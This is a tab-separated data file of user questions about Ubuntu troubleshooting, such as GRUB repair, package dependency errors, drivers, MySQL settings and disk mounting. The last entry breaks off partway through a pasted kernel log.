396361	grub-pc missing	i got stuck on the grub repair sudo chroot `` /mnt/boot-sav/sda6 '' apt-get install -y -- force-yes grub-pc linux reading package lists ... done building dependency tree reading state information ... done package grub-pc is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'grub-pc ' has no installation candidate how to solve this ?
396362	remains left after converting lubuntu to kubuntu	i 've installed a lubuntu raring ( which was the only iso i had that would boot on the pc i tried to install kubuntu ) and installed kubuntu-desktop and then did do-release-upgrade . now i 've got a kubuntu saucy ( upgrade without problems ) , but there are still remains from lxde/lubuntu-desktop left . as an example , i can still select openbox and lxde as desktop environments on login . i 've found this answer to a similar question , but it 's about converting to xubuntu quantal and i 'd like to know whether there are differences in removing lubuntu saucy packages .
396363	how to discard saved session on xubuntu	i installed xubuntu and used one of shutdown functions when shutdown it . it looks as follow image : i leaved tick and now i always login at this session . but i want to leave this session and login as typical . how to discard this session , and login without saved session ?
396366	extend home partition /home with additional hdd	i have two hdd installed where at the moment one sda* runs ubuntu 12.04 and sdb* runs ubuntu studio . i want to add the complete sdb* hdd to my /home partition on sda* is this possible ?
396372	is there an application for hr management in ubuntu ?	is there an application available in ubuntu that can : keeps attendance details of the employees . overtime hours can make salary of employees . it should be easy to use than libre calc .
396373	recovering damaged ubuntu	situation : one day my ssd hard failed and deleted many files randomly , consisting some files of the os . damage was big enough that made the os unable to boot and even unable to chrooted . fortunately i had another ubuntu on another disc and i was able to recover chroot and then boot and network functionality of damaged os . then i booted the damaged os and ran a script that reinstalled every package installed on it ( with apt-get install < package > -- reinstall ) it was n't as easy as i 'm describing it , there were lots of packages that needed specific attention . after that almost everything 's fine except running 32bit binaries like wine and adb . i need an expert in this field to tell me what should i do to recover executing 32bit binaries . for example suppose that i wan na run wine : first lets run it on fish : # wine failed to execute process '/usr/bin/wine ' . reason : the file '/usr/bin/wine ' does not exist or could not be executed . now lets run it on bash : # wine bash : /usr/bin/wine : no such file or directory lets enter the full location : # whereis wine wine : /usr/bin/wine /usr/bin/x11/wine /usr/share/wine /usr/share/man/man1/wine.1.gz # /usr/bin/wine bash : /usr/bin/wine : no such file or directory lets see if the file really exists : # ls -l /usr/bin/wine -rwxr-xr-x 1 root root 9748 dec 18 05:11 /usr/bin/wine what ldd and file say : # ldd /usr/bin/wine not a dynamic executable # file /usr/bin/wine /usr/bin/wine : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0xe4e2fb58bdbbbc2dedf7483825900ed35a6dc989 , stripped how to solve this ? damaged os is ubuntu 13.10 amd64 .
396374	can i install the ubuntu sdk alongside with pyqt ?	i installed the ubuntu sdk and everything goes very well . now i want to install pyqt just to mess around with it . pyqt comes with qt creator , but it was already installed by the ubuntu sdk . how can i install pyqt in this conditions ?
396375	how to install ubuntu in emachines t2200	how can i install ubuntu on my emachines t2200 ? it seems putting on a usb stick and trying to boot from the .iso file makes the bios lock up . note this is after an attempt to force install windows 8 , but the amd 2200 on board does not support nx pae and sse2 . it will still give the option to boot windows xp without the stick , but with the usb stick it hangs on the emachines screen . is this a problem with the windows 8 install attempt or just a problem with usb booting in this bios ? or is there another way to install ubuntu using the .iso i downloaded ? it was 12. ? ? ? 32 bit version . the emachine has been upgraded to 2gb ram ( max ) .
396377	how do i make tools options show up in gimp 2.8 ?	i 'm using gimp 2.8 . how do i make tools options window show up ? e.g . i select a flood fill tool , and i would like to change threshold .
396381	updating variables in my.cnf	i set lower_case_table_names = 2 in /etc/my.cnf file . i also updated this variable in /etc/mysql/my.cnf file . after setting the variable i restarted mysql server , but still the value is 0 , when i use show variables . i 'm using mysql 5.5 . any ideas what else needs to be done ? update my.cnf content : - # # the mysql database server configuration file . # # you can copy this to one of : # - `` /etc/mysql/my.cnf '' to set global options , # - `` ~/.my.cnf '' to set user-specific options . # # one can use all long options that the program supports . # run program with -- help to get a list of available options and with # -- print-defaults to see which it would actually understand and use . # # for explanations see # http : //dev.mysql.com/doc/mysql/en/server-system-variables.html # this will be passed to all mysql clients # it has been reported that passwords should be enclosed with ticks/quotes # escpecially if they contain `` # '' chars ... # remember to edit /etc/mysql/debian.cnf when changing the socket location . [ client ] port = 3306 socket = /var/run/mysqld/mysqld.sock # here is entries for some specific programs # the following values assume you have at least 32m ram # this was formally known as [ safe_mysqld ] . both versions are currently parsed . [ mysqld_safe ] socket = /var/run/mysqld/mysqld.sock nice = 0 [ mysqld ] # # * basic settings # lower_case_table_names = 2 user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking # # instead of skip-networking the default is now to listen only on # localhost which is more compatible and is not less secure . bind-address = 127.0.0.1 # # * fine tuning # key_buffer = 16m max_allowed_packet = 16m thread_stack = 192k thread_cache_size = 8 # this replaces the startup script and checks myisam tables if needed # the first time they are touched myisam-recover = backup # max_connections = 100 # table_cache = 64 # thread_concurrency = 10 # # * query cache configuration # query_cache_limit = 1m query_cache_size = 16m # # * logging and replication # # both location gets rotated by the cronjob . # be aware that this log type is a performance killer . # as of 5.1 you can enable the log at runtime ! # general_log_file = /var/log/mysql/mysql.log # general_log = 1 # # error log - should be very few entries . # log_error = /var/log/mysql/error.log # # here you can see queries with especially long duration # log_slow_queries = /var/log/mysql/mysql-slow.log # long_query_time = 2 # log-queries-not-using-indexes # # the following can be used as easy to replay backup logs or for replication . # note : if you are setting up a replication slave , see readme.debian about # other settings you may need to change . # server-id = 1 # log_bin = /var/log/mysql/mysql-bin.log expire_logs_days = 10 max_binlog_size = 100m # binlog_do_db = include_database_name # binlog_ignore_db = include_database_name # # * innodb # # innodb is enabled by default with a 10mb datafile in /var/lib/mysql/ . # read the manual for more innodb related options . there are many ! # # * security features # # read the manual , too , if you want chroot ! # chroot = /var/lib/mysql/ # # for generating ssl certificates i recommend the openssl gui `` tinyca '' . # # ssl-ca=/etc/mysql/cacert.pem # ssl-cert=/etc/mysql/server-cert.pem # ssl-key=/etc/mysql/server-key.pem [ mysqldump ] quick quote-names max_allowed_packet = 16m [ mysql ] # no-auto-rehash # faster start of mysql but no tab completition [ isamchk ] key_buffer = 16m # # * important : additional settings that can override those from this file ! # the files must end with '.cnf ' , otherwise they 'll be ignored . # ! includedir /etc/mysql/conf.d/
396387	none of the peripherals ( eth , usb ) working after upgrading to kernel version 3.8.5 in ubuntu 12.04 lts	i have been using ubuntu from a long time but i had never been in the depth of ubuntu . at present i am using ubuntu 12.04 lts . it was getting hanged randomly and fast when i was using firefox . i search a bit and found that possible solution is to upgrade kernel . earlier my kernel was ( i am not sure though ) 3.5.x something and then i upgrade it to 3.8.8 using this link and then after reboot when i open ubuntu , graphics which was ugly earlier was perfectly fine but no other peripheral work other then vga port . i do n't know what i had done wrong , and i am unable to post any other related info as even internet is not working in ubuntu . had i done anything wrong like upgrading linux kernel of ubuntu 12.04 to a kernel version which is not supported ? please help me .
396389	openstack to one machine	i want to use juju to deploy openstack . i want to install - mysql , rabbitmq , quantum , glance , cinder , opnestack-dashboard , keystone and etc . on two nodes /the one is bootstrapped/ . i install the juju-gui on the bootstrapped node -machine '' 0 '' and the elements of openstack on machine '' 1 '' i make the relations with the gui but when i try to enter in the horizon dashboard i get '' internal error 500 '' is it because i used only one machine ? what should i do to resolve the problem ?
396390	set external hard disk to standby when shut down	i have set my external hard disk to spin down after 10 minutes of inactivity . however , when i shut down my system , the disk ( ext4 , one partition ) get 's unmounted , causing the disk to spin up and it remains spinning . how can i force the disk to stand by after un-mounting ?
396391	issue with installing software	when i am installing a software in ubuntu 13.10 using terminal with apt-get install command , it is saying that e : unable to locate package < pakage name > please post solution of this problem .
396392	where do i obtain the ubuntu copyright logos ?	i saw a `` case mockup '' : http : //thinkonbytes.blogspot.it/2012/02/ubuntu-mini-computer-concept-design.html i would like to implement it . where can i get the copyright logos ?
396394	i downloaded ubuntu-12.04.3-desktop-i386 but ca n't install	i downloaded ubuntu-12.04.3-desktop-i386.iso on a windows 7 laptop with no disc-burner . when i double-click the file wubi.exe i get this message : '' c : \ubuntu\wubi.exe is not a valid win32 application.q why this is happening ? how can i install ubuntu on this computer ?
396399	xubuntu on macmini , would not boot , stupidly reset pram	xubuntu on macmini , would not boot , stupidly reset pram ... i only have linux partition on the hdd , im not really a mac or osx fanboy , but this makes a great htpc ! i have installed so much , and have sourcecode in there i dont want to loose . now i can boot into a live cd , and copy mostly everything , but it would take me days to get it to the current state ! i had refind on it , and it would boot grub then xubuntu ! what i need now is a way to fix grub2 , i have tried several tutorials , boot-repair etc . i cant get anything to restore the efi ... its just a folder with a question mark on it ! could anyone help me with a quick fix ? efi partition is on sda1 and boot ( grub ) on sda2 , linux is sda3 ( lvm ) and theres a swap partition if im not mistaken . please help since im leaving it to my kids and really need to fix this asap . it was such a nice setup , xbmc with a ps3navi as its controller ! ps : i can not boot into osx , its deleted from my hdd ... and i have no dvds to install it . i have a drive with osx on , that i can connect through usb , it has refit on it , which would be of great help , but its in another city !
396404	is it possible to install linux as a secondary os to fix the problems on windows ?	i have a windows xp pc that has been totally blocked with a virus . it does boot , but once fully started it gets blocked , and nothing can be done . i tried to start my anti-virus , and other rescue programs from disks , but none would work . i was wondering , is it possible to install linux as a secondary os to fix the problems on windows ? does any one have an idea on how to help me ?
396406	how to set ubuntu to use specific graphic unit ?	i tried lots of thnigs but nothing changed . i have lenovo y510p with dual nvidia gt750m graphic cards . with two graphic cards ubuntu does n't boot normally.i tried to install and boot ubuntu with one grapchic card and it worked perfectly but i dont want to plug in and out every time i want to use ubuntu . is it possible to make an exeption to ubuntu to use only intel 's graphic card ? edit : i noticed that i dont have an xorg.conf file in /etc/x11 directory.so i made one by x -configure.and when i put it in /etc/x11 screen freezes on boot but i can hear starting sound of ubuntu.here is the xorg.conf file which makes my screen freeze http : //pastebin.com/l1tsex9k ( i made this xorg.conf when just 1 video card plugged ) .
396407	boost unmet dependencies	i heard it is easy to install libraries on ubuntu so i switched to ubuntu , i tried to install boost so i write : sudo apt-get install libboost-all-dev and i get this : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libboost-all-dev : depends : libboost-python-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . now i see that there is a canonical-question for this but as the answer suggests : apt is a package management system for debian and other linux distributions based on it , such as ubuntu . for the most part , apt is easy to use for installing , removing , and updating packages . in rare instances , often when you are mixing in third-party dependencies , there is a chance that apt-get may end up giving you an error telling you that a package installation could not be completed . but i doubt there is anything rare about my situation . in fact the very reason i tried to install boost is because i know it should be a no-brainer , and i wished i would have some success with it before installing openscenegraph , which i will actually need . i wanted to try whether the basic things work , and it has let me down . please help instead of dupe-closing my question against the `` general solution '' i tried that , but at some point i have no idea what the answerers are talking about i.e : disable/remove/purge ppas : ppas ( personal package archive ) are repositories hosted on launchpad . you can use ppas to install or upgrade packages that are not available in the official ubuntu repositories . one of the most common causes of unmet dependencies are ppas , specially when used to upgrade the existing package in ubuntu repositories . to solve the problem you have tree options , disable , purge ( revert back to original package in ubuntu repositories ) or remove ppa . so my specific question is this : i have installed ubuntu 12.04 lts this very day i installed codeblocks , g++ , build-essentials , no problem . i tried to sudo apt-get install openscenegraph , it may have worked although i can not locate the header files on my hard drive ( maybe i should have downloaded the openscenegraph-dev ( but it does n't exist ) ) so i chose to install boost to see if this package installer works in the first place and i got ( unmet dependencies ) what i pasted above . why it does n't work and how can i get it to work ? edit : apt-cache madison libboost-python-dev returns : libboost-python-dev | 1.48.0.2 | http : //archive.ubuntu.com/ubuntu/ precise/main amd64 packages
396410	eclipse auto shutdowns when creating new project	when i click finish on a new project in eclipse which i installed with this command sudo apt-get install eclipse-platform . this popup window comes and no matter if i choose yes or no it closes the application : i have tried running eclipse from terminal so i can see what happends , but i 'm not so good to find out the problem , but this is what i get : jeggy @ jeggy-dell-system-xps-l502x : ~ $ eclipse fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 14 : reading configurations from ~/.fonts.conf is deprecated . # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007f305f07a528 , pid=11475 , tid=139846321936128 # # jre version : 7.0_25-b30 # java vm : openjdk 64-bit server vm ( 23.7-b01 mixed mode linux-amd64 compressed oops ) # problematic frame : # c [ libgobject-2.0.so.0+0x19528 ] g_object_get_qdata+0x18 # # failed to write core dump . core dumps have been disabled . to enable core dumping , try `` ulimit -c unlimited '' before starting java again # # an error report file with more information is saved as : # /home/jeggy/hs_err_pid11475.log # # if you would like to submit a bug report , please include # instructions on how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-7/ # the crash happened outside the java virtual machine in native code . # see problematic frame for where to report the bug . # that font error is because i 'm running kubuntu , and i get that error right away but i do n't think it has anything to do with it closes when i create a new project . and if anyone is interested i posted the pid11475.log here . and as it says there try `` ulimit -c unlimited '' , i have tried that but did n't change anything .
396412	network dns problem	i have ubuntu 12.04 lts and windows server 2008 with dns server and ad , both installed on virtualbox . firstly i want to ping my domain from ubuntu host . to do this i configured /etc/network/interfaces and set static ip + add my dns server to /etc/resolv.conf . i can ping the server ip but ca n't ping the domain . i did the same thing on debian , version without gui and windows xp , and on these hosts everything is ok . i tried to solve this for 2 hours , but unsuccessfully its not working on ubuntu . how to do it ?
396418	how to mklink /home/ to a new empty partition	due some weird issues with my current lubuntu i 'm going to do fresh installation . but when i install lubuntu i need to do two things that i probably ca n't perform because i 'm newbie . i 'm going to create 30gb of unallocated space on my ssd . i want to install lubuntu there and i want to create 20gb swap file . can you please tell me how to do it ? another thing : when i will install lubuntu i need to do mkling ( symlink ) hard symlink . i need to move entire /home/ folder from ssd to hdd partition . i do n't want temporally link . i want to do move /home/ forever . please explain me how to create 20gb page file when i install lubuntu and please send me commands and steps that allow me to do /home/ mklink
396422	synaptics driver does n't load sometimes	sometimes ( randomly ) , the synaptics touchpad driver wo n't load on bootup . when reading /var/log/boot.log , i do n't see anything touchpad-driver-like being started when this happens . but the file /dev/input/mouse0 exists and i can perform simple actions with my mousepad ( pointing , clicking , but no scrolling ) and the pointer speed is very low when moving it via the touchpad . when typing synclient into terminal while this is happening , it tells me could n't find synaptics properties . no synaptics driver loaded ? whats the problem here ?
396424	how do i change the close/maximise/minimise button sizes in 13.10 ?	how could i change the button size for the window controls . i 'm using a touch screen and i 'm having difficulty hitting the right one . i 've tried adjusting fonts but this does not help . any ideas folks ?
396425	how install ubuntu-touch emulator on ubuntu13.10	i downloaded the emulator deb file : android_20131006-1510-0ubuntu6_all.deb from launchpad i then ran the command dpkg -i android_20131006-1510-0ubuntu6_all.deb to install it . but i do not know how to run the emulator after installing finished . i try running command run-emulator.sh , but terminal shows no such command , so what the exact command to run the emulator ?
396427	inserting images in lyx document processor	recently i have installed lyx in my ubuntu 12.04lts for the purpose of text editing . but i am facing some problems while inserting images . whenever i go to the `` insert graphics '' option , browse the picture i want to insert and click the file ( .png , .jpg ) , the application closes automatically . i tried to reconfigure it also but still it shows the same problem . how can i fix this problem ?
396429	changing ulimit on ubuntu 12.04 never works	i am working with hadoop and need to change number of open files ulimit -n. i have seen similar questions on stackoverflow and elsewhere and have tried everything in those answers , but it still does not work . i am working with ubuntu 12.04 lts . here is what i have done : change limits in /etc/security/limits.conf , i have put in settings for * and root . i have also changed limits to some number like 10000 and unlimited . * soft nofile 1513687 * hard nofile 1513687 root soft nofile 1513687 root hard nofile 1513687 i have also tried above setting with - instead of soft and hard . after these changes , i have made changes to /etc/pam.d/ files such as : common-session common-session-noninterative login cron sshd su sudo i have added session required pam_limits.so to the beginning of each file . i made a restart of the box in question and the settings did not take effect . i have also found that there were files inside /etc/security/limits.d/ directory for the users hbase mapred and hdfs . i have tried changing limits in these individual files as well to no avail . i have tried putting ulimit -s -n unlimited inside /etc/profile as well . it did not work . finally , i have tried putting limit nofile unlimited unlimited inside /etc/init.d/hadoop* files as first line . did not work . one interesting thing though is , i do not have hbase installed on the box but i do have a hbase.conf file inside /etc/security/limits.d/ directory . the settings in this file are reflected with ulimit -n. but settings from hdfs.conf and mapred.conf are not reflected . which suggests that something is overwriting settings for hdfs and mapred . i guess i have tried everything people suggested on several forums , is there anything else that i may have missed or done incorrectly ? i am using cdh 4.4.0 as my hadoop distribution .
396430	system repair ( 12.04 , 64 bit )	my friend is running ubuntu 12.04 ( precise ) , 64bit-version , on her laptop . unfortunately she skipped some of the automated updates or stopped them somehow , so that the internet does n't function correctly : while wifi contact to the fritz ! box and change of respective settings is possible , there is no internet access in firefox or via apt-get or else ! could her broken system be repaired or do i have to reinstall the whole system now ?
396431	error on restart of computer ( unknown file system ; grub rescue )	i have a dual boot system having windows 8 with ubuntu 12.10 , i was partitioning my disk size in windows 8 after that i restart my laptop facing error unknown file system grub rescue > i followed these steps : ls ( which showed all the partitions ) ( hd0 ) ( hd0 , msdos7 ) ( hd0 , msdos6 ) ( hd0 , msdos5 ) ( hd0 , msdos4 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) 2.set ( showed current pointing location ) prefix = ( hd0 , msdos5 ) /boot/grub prefix= ( hd0 ) /grub root=hd0 grub > rescue i remember ubuntu was either in msdos6 or msdos4 , i tried set root=hd0 , msdos6 set prefix= ( hd0 , msdos6 ) /boot/grub insmod normal error : unknown file system i changed to set prefix= ( hd0 , msdos6 ) /grub but faced the same error then i tried it for all partitions , getting same error -- > unknown file system how i can set the path , i have important data in my drives . looking forward for your help
396433	want to install ubuntu 12.04 new on ssd for / and hdd for /home but keep all settings	good evening , i have ubuntu installed right now on my 2tb hdd . runs very good . the last weeks i configured all programs/games/audio stuff now and are very fine with it . now i got one new ssd drive ( 600gb ) and want to setup ubuntu with a fresh install but not to loose all my apps/games/audio/configurations etc . also i want to get ubuntu as fast as possible at boot time . so basically from my point of view i would do a complete systembackup over night with ubuntu backup would install / partition to my new 600gb ssd would install /home to my 2tb hdd restore from my backup to both drives ssd and hdd is that the right way ? what about swap ? where should it be stored ? sdd or hdd ? **edit** just for those trying the same . its quite simple ... physically install your new drives to your pc install a fresh copy of ubuntu to your ssd with `` / '' and your hdd with `` /home '' ( you might want to change / and /home ) but keep your old drive . liveboot from gparted live cd copy over your old `` / '' to the new ssd `` / '' and your old `` /home '' to your new hdd `` /home '' ( this may take some time depending on your data ) reboot done if you got stucked in busybox after 5. just try boot repair from ubuntu or boot repair live cd
396437	how can i remove the grayscale page background of a pdf document scan while preserving the text ? ( binarization )	my pdf contains 600 pages with images of text . it has 2 `` layers '' . `` layer 1 '' : background colour image '' layer 2 '' : text image i would like to remove all background image layers in the total pdf file as shown in the image . could you suggest me any software/tool ?
396442	how to create a time-lapse video from jpeg images using avconv ?	i have a few hundreds of still images . the files are named according to the canon convention - img_2501.jpg , img_2502.jpg , img_2503.jpg , ... . i 've tried : % avconv -f image2 -i img_ % 04d.jpg avconv_out.avi avconv version 0.8.9-6:0.8.9-0ubuntu0.13.10.1 , copyright ( c ) 2000-2013 the libav developers built on nov 9 2013 19:09:46 with gcc 4.8.1 img_ % 04d.jpg : no such file or directory i guess that img_ % 04d.jpg is not found because avconv expects img_0000.jpg , img_0001.jpg , ... . i can create a symlink for that , but it 's a really ugly hack . how do i create a video from these still photos using avconv without renaming ?
396443	how can i set up ( already installed ) ssh for ubuntu touch ?	i keep getting 'no route to host ' when i try ssh phablet @ ip . i 've already read the release notes on how to set it up but it does n't work . i already have openssh-server and ssh packages on my laptop and phone ( nexus 4 ) . ssh on phone is outdated though but ca n't update it ( ca n't find the package , 404 error ) . my wlan and lan networks do n't have different subnet masks but to make sure i connected my laptop via wifi and got the same error . weird thing is my phone can ssh to my laptop ( by connect i mean : permission denied ( publickey ) ) but does n't work the other way around . i 'm sure the ip is right because i 've assigned a static ip to 'ubuntu-phablet' i have already tried this even though i did n't have that problem . edit : i 've changed from trusty r79 to trusty-proposed r101 . still have the same issue . although i was able to update the ssh package . this time i get 'connection refused ' . i still can ssh from my phone to my laptop but not the other way around . fixed . ssh service was n't started . phablet @ ubuntu-phablet : ~ $ sudo ifconfig link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:347 errors:0 dropped:0 overruns:0 frame:0 tx packets:347 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:26554 ( 26.5 kb ) tx bytes:26554 ( 26.5 kb ) wlan0 link encap : ethernet hwaddr 10:68:3f:7f:26:60 inet addr:192.168.1.110 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :1268:3fff : fe7f:2660/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:466 errors:0 dropped:0 overruns:0 frame:0 tx packets:428 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:41581 ( 41.5 kb ) tx bytes:37169 ( 37.1 kb )
396445	can not mount fat32 system as 777	i am trying to mount an external hdd ( fat32 ) with 777 permissions as i wish to share it via nfs on my local network . i am mounting using the following command ( and i have tried several variations ) : sudo mount -t vfat -o user , umask=0000 /dev/sda1 /mnt/export but it is still mounting the hdd as 755
396448	google chrome opens wrong	when i open google chrome on ubuntu 13.10 , it opens a new window on a different launcher icon ( i have chrome in my launcher pinned ) and the title of the window is a tab that i do n't even have open anymore . i have uninstalled and reinstalled google chrome . anybody have a fix for this ?
396451	running another user 's programs from file manager ( newbie )	i do very little with linux , but have a vmware ubuntu 13.04 virtual machine . i opened the file manager ( thunar ) as root , and i now can access files of another user on another volume . however , when i try to run executables , nothing happens . i can use the context menu to `` execute '' them and change permissions , but i ca n't get any to run . the other volume contains backtrack 5 , but i ca n't boot to that volume . is it not possible to do what i 'm trying to accomplish ? thanks for any help !
396453	getting always - `` xmpfilter : command not found ''	i have installed vim plug-in - t9md/vim-ruby-xmpfilter . my .vimrc contains 1 set nocompatible `` we 're running vim , not vi ! 2 syntax on `` enable syntax highlighting 3 filetype on `` enable filetype detection 4 filetype indent on `` enable filetype-specific indenting 5 filetype plugin on `` enable filetype-specific plugins 6 7 set number 8 set expandtab 9 set tabstop=2 shiftwidth=2 softtabstop=2 10 set autoindent 11 12 13 `` let g : xmpfilter_cmd = '/home/kirti/.rvm/rubies/ruby-2.0.0-p0/bin/ruby' 14 15 set rtp+=~/.vim/bundle/vundle/ 16 call vundle # rc ( ) 17 18 `` let vundle manage vundle 19 `` required ! 20 21 set shell=/bin/bash\ -i 22 23 bundle 't9md/vim-ruby-xmpfilter' 24 bundle 'townk/vim-autoclose' 25 bundle 'vim-ruby/vim-ruby' 26 bundle 'gmarik/vundle' 27 bundle 'scrooloose/nerdtree' 28 29 autocmd filetype ruby nmap < buffer > < m-c > < plug > ( xmpfilter-mark ) 30 autocmd filetype ruby xmap < buffer > < m-c > < plug > ( xmpfilter-mark ) 31 autocmd filetype ruby imap < buffer > < m-c > < plug > ( xmpfilter-mark ) 32 33 autocmd filetype ruby nmap < buffer > < m-z > < plug > ( xmpfilter-run ) 34 autocmd filetype ruby xmap < buffer > < m-z > < plug > ( xmpfilter-run ) 35 autocmd filetype ruby imap < buffer > < m-z > < plug > ( xmpfilter-run ) when i write in my .rb file as 1 + 1 , then ctrl+c , so i get 1 + 1 # = > . now when i am trying to execute it i am getting error as `` xmpfilter : command not found '' . xmpfilter and rvm both is installed in my ubuntu13.10 . kirti @ kirti-aspire-5733z : ~ $ which xmpfilter /home/kirti/.rvm/gems/ruby-2.0.0-p0/bin/xmpfilter kirti @ kirti-aspire-5733z : ~ $ which rvm /home/kirti/.rvm/bin/rvm kirti @ kirti-aspire-5733z : ~ $
396454	can not install ubuntu , can not see partition	i am having a strange problem ( strange for me ) .i am trying to install ubuntu on my lenovo u310.it has a built in 32gb ssd card . i can see my partitions and both hard disks in gparted but when i try to install , i get no option to make any changes or even see my hard disk . here is a screenshot : i tried to install it in my main hard disk but the same result.i tried it with both 32 and 64 bit 12.04 and 13.10 versions of ubuntu . i have never faced any problem like this before . how to solve this ? p.s i do not have 4 primary partitions.here is a screeshot
396456	hybrid graphics ubuntu 13.10	i have a samsung notebook ativ4 with two video cards : intel 4000 hd graphics ( integrated ) and an nvidia geforce 710m . my objective is to use the nvidia video card or get a video card switcher . i heard about ubuntu control center , but i can not find it on the web , all sources i found are unreacheable or out-of-date so i can not download and install it . p.s : sorry for my english julioz
396458	13.10 install formated all hdds not just sda - data lost	had to rebuild with new motherboard ( ga990fxa_ud3 ) when old one died . hdds also gone at same time . installed two new hdds ( 1tb each ) . copied music , video , and entire home directory from dying hdd to the sdb drive in sata port 1 . installed ubuntu 12.04-lts on sda drive in sata port 0 . updated 12.04 with all available updates , rebooted . upgrades to 12.10 and it wo n't boot . tried boot repair , no luck . burned 13.10 iso to dvd and started over . was n't i surprised when the 13.10 does n't allow me to select which drive to load it on ( i did n't notice until later ) and it formatted both drives . everything gone . is there any way for me to recover ? my home drive is most important , tax returns , home budget etc . i do have the important files backed up to a very old drive but it does n't attach to this new motherboard . i 've put in close to 100 hours with this rebuild , new pita motherboard from gigabyte-me . black screens , busybox prompt with no working keyboard . on and on . left windows several years ago for dapper drake , i am so on the edge of leaving ubuntu and installing win-7 . so frustrated .
396459	how to use ubuntu when you have no access to previous owners password	i have an old gateway420gr that i was hoping to use as my computer crashed . i been unable to get past authenticity issues as i do n't know the original owners passwd . i ca n't access the internet via a wired connection . i have tried to access the grub via recovery mode to attempt to change the user passwd but to only get `` manipulation token error '' message . while waiting for someones response to this question , i will try to read other comments ! also , is there a way to get a live bootable dvd ? william
396460	how to find a hidden link with google chrome in soundcloud	at view-source : https : //soundcloud.com/djchusmusic/week-31-2013-flashback-chus there is a sound file which i 'd like to download . i use google chrome and sometimes firefox and ubuntu 12.04 . i ca n't find the link to the file . ( i tried .mp3 ) . thanks , janina
396464	alternative ways of mounting usb ntfs external-hdd	i mount my samsung hard disk through this command sudo mount /dev/sdb1 /media/samsung but it does n't work except after running the command sudo f-disk -l and waiting for it about 5 minutes to finish ! every time i need mount the hard disk i have to wait 5 minutes ! ! this is really really bugging me . are there any other ways to try to mount this hard disk ? maybe through some program ? or maybe by granting the hard disk extra permissions or whatever ? ? ? ? ? ? ask me for any extra information you need to know . it 's a 500gb hard disk . you can look at the question i asked when i did n't know how to mount the hard disk at first : ubuntu does n't `` see '' external usb hard disk thanks in advance : )
396465	radeon hd7650 ( thames xt ) open source drivers dpm not working on ubuntu 13.10 ?	i have recently shifted from using ati proprietary drivers to open source drivers . however , i notice that the laptop runs hotter and battery isnt lasting long either . on the contrary , many online forums say the latest open source drivers have helped gain battery life in laptops with switchable graphics . i have checked dpm state and it returns file not found/not in directory . i feel the open source drivers have not installed properly or not supported with the kernel & distribution i am using ? i am not on ubuntu 13.10 with 3.12 kernel . > video:02/input/input9 [ 4.561483 ] [ drm ] initialized i915 1.6.0 20080730 for 0000:00:02.0 on minor 0 [ 4.561711 ] [ drm ] initializing kernel modesetting ( turks 0x1002:0x6840 0x103c:0x1895 ) . [ 4.561746 ] [ drm ] register mmio base : 0x60000000 [ 4.561747 ] [ drm ] register mmio size : 131072 [ 4.561750 ] vga_switcheroo : enabled [ 4.561877 ] atpx version 1 [ 4.604338 ] microcode : cpu1 sig=0x306a9 , pf=0x10 , revision=0x15 [ 4.617398 ] microcode : cpu2 sig=0x306a9 , pf=0x10 , revision=0x15 [ 4.617917 ] microcode : cpu3 sig=0x306a9 , pf=0x10 , revision=0x15 [ 4.619460 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba [ 4.691400 ] kvm : disabled by bios [ 4.772793 ] snd_hda_intel 0000:00:1b.0 : irq 47 for msi/msi-x [ 4.784847 ] mute led gpio 8 polarity 1 [ 4.785036 ] autoconfig : line_outs=1 ( 0xd/0x0/0x0/0x0/0x0 ) type : speaker [ 4.785038 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 4.785040 ] hp_outs=1 ( 0xb/0x0/0x0/0x0/0x0 ) [ 4.785041 ] mono : mono_out=0x0 [ 4.785042 ] inputs : [ 4.785043 ] internal mic=0x11 [ 4.785044 ] mic=0xc [ 4.809561 ] input : hda intel pch hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:1b.0/sound/card0/input13 [ 4.836841 ] [ drm ] enabling rc6 states : rc6 on , rc6p on , rc6pp off [ 5.178285 ] linux video capture interface : v2.00 [ 5.181218 ] bluetooth : core ver 2.16 [ 5.181239 ] net : registered protocol family 31 [ 5.181241 ] bluetooth : hci device and connection manager initialized [ 5.181248 ] bluetooth : hci socket layer initialized [ 5.181251 ] bluetooth : l2cap socket layer initialized [ 5.181258 ] bluetooth : sco socket layer initialized [ 5.233461 ] usbcore : registered new interface driver btusb [ 5.237611 ] uvcvideo : found uvc 1.00 device hp truevision hd ( 1bcf:2c0e ) [ 5.247983 ] input : hp truevision hd as /devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0/input/input14 [ 5.373462 ] input : hp wmi hotkeys as /devices/virtual/input/input10 [ 5.385204 ] psmouse serio1 : synaptics : touchpad model : 1 , fw : 8.1 , id : 0x1e2b1 , caps : 0xd00123/0x840300/0x126c00 , board id : 2183 , fw id : 1116193 [ 5.533020 ] input : synps/2 synaptics touchpad as /devices/platform/i8042/serio1/input/input6 [ 6.203202 ] atom bios : hp/compal [ 6.203290 ] radeon 0000:01:00.0 : vram : 2048m 0x0000000000000000 - 0x000000007fffffff ( 2048m used ) [ 6.203293 ] radeon 0000:01:00.0 : gtt : 